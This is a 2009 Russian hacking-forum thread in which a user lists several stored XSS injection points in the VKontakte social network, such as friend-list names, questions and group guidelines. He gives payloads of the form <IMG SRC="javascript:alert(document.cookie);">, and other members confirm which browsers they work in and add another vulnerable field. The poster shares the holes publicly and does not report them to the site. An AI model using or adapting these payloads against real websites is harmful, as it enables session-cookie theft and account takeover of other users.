ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS Вконтакте :)
  #1  
Старый 25.11.2009, 11:57
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию XSS Вконтакте :)

И так приступим !

1. XSS ~ заходим в приложение ---> добавить друзей ---> вбиваем <IMG SRC="javascript:alert('XSS');"> и нажимаем " Enter "
ой, хрень какая то

2. XSS ~ http://vkontakte.ru/questions.php ---> создать вопрос ---> <IMG SRC="javascript:alert(document.cookie);"> ( если не с работала, то просто редактируем и ставим этот же скрипт !
упс )

3. XSS ~ Заходим в свою группу ---> редактировать руководство ---> видем под админом " редактировать " вводим <IMG SRC="javascript:alert(document.cookie);"> ---> жмем Enter !
ну что это за приследование такое

4. XSS ~ http://vkontakte.ru/friends.php?id= ---> создать список ---> Введите название списка , найти друга ---> скрипт ---> Enter
уау!

5. XSS ~ где есть еще )) не помню...

P.S : Хотел вконтакту написать может голосов бы дали т.к. тяжкое финансовое положение ! Но подумал и решил " все в народ " !
 
Ответить с цитированием

  #2  
Старый 25.11.2009, 12:15
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию

что нить из этого интересно работает ) По мне так ничего.
__________________
Cервер cs 1.6
cs.antichat.net:27015
 
Ответить с цитированием

  #3  
Старый 25.11.2009, 12:18
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Работает... ТС, хакир штоле? Зачем спалил превад?
 
Ответить с цитированием

  #4  
Старый 25.11.2009, 12:22
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Цитата:
этому превату по скромным подсчетам более года
Нет, тогда бы уже прикрыли. Какой год, о чем ты? Списки недавно появились.
 
Ответить с цитированием

  #5  
Старый 25.11.2009, 12:33
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

новые я их 23 числа нашел и сегдня кинул! Все XSS тока мои!
 
Ответить с цитированием

  #6  
Старый 25.11.2009, 12:48
LzD
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533

Репутация: 43
По умолчанию

Цитата:
Сообщение от Ruslan1817  
новые я их 23 числа нашел и сегдня кинул! Все XSS тока мои!
да че ты перживаешь то так ) нафик они никому не нужны.

сообщения такого вида не несут никакой информационной нагрузки, если такое повториться- подам заявку на бан т к удалил четыре похожих на это сообщение данного юзера
Kusto

Последний раз редактировалось Kusto; 25.11.2009 в 17:22.. Причина: Уважайте чужой труд
 
Ответить с цитированием

  #7  
Старый 25.11.2009, 12:55
BuG_4F
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
Провел на форуме:
1436858

Репутация: 171
Отправить сообщение для BuG_4F с помощью ICQ
По умолчанию

В firefox неработает =\
 
Ответить с цитированием

  #8  
Старый 25.11.2009, 12:57
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Цитата:
Сообщение от BuG_4F  
В firefox неработает =\
Все работает ! Значит не так что то делаешь ;-)

____________

при чем тут нужны не нужны ?!
 
Ответить с цитированием

  #9  
Старый 25.11.2009, 12:57
BuG_4F
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
Провел на форуме:
1436858

Репутация: 171
Отправить сообщение для BuG_4F с помощью ICQ
По умолчанию

А в опере всё ок
 
Ответить с цитированием

  #10  
Старый 25.11.2009, 14:17
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Еще в Мои Новости заходишь, "показывать новости некоторых друзей". Поле "имя друга" уязвимо.

UPD: Похоже, XSS во всех полях окошек с фильтрацией друзей.

Последний раз редактировалось root_sashok; 25.11.2009 в 14:22..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Пассивная XSS вконтакте wildshaman Уязвимости 5 17.06.2009 13:28
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ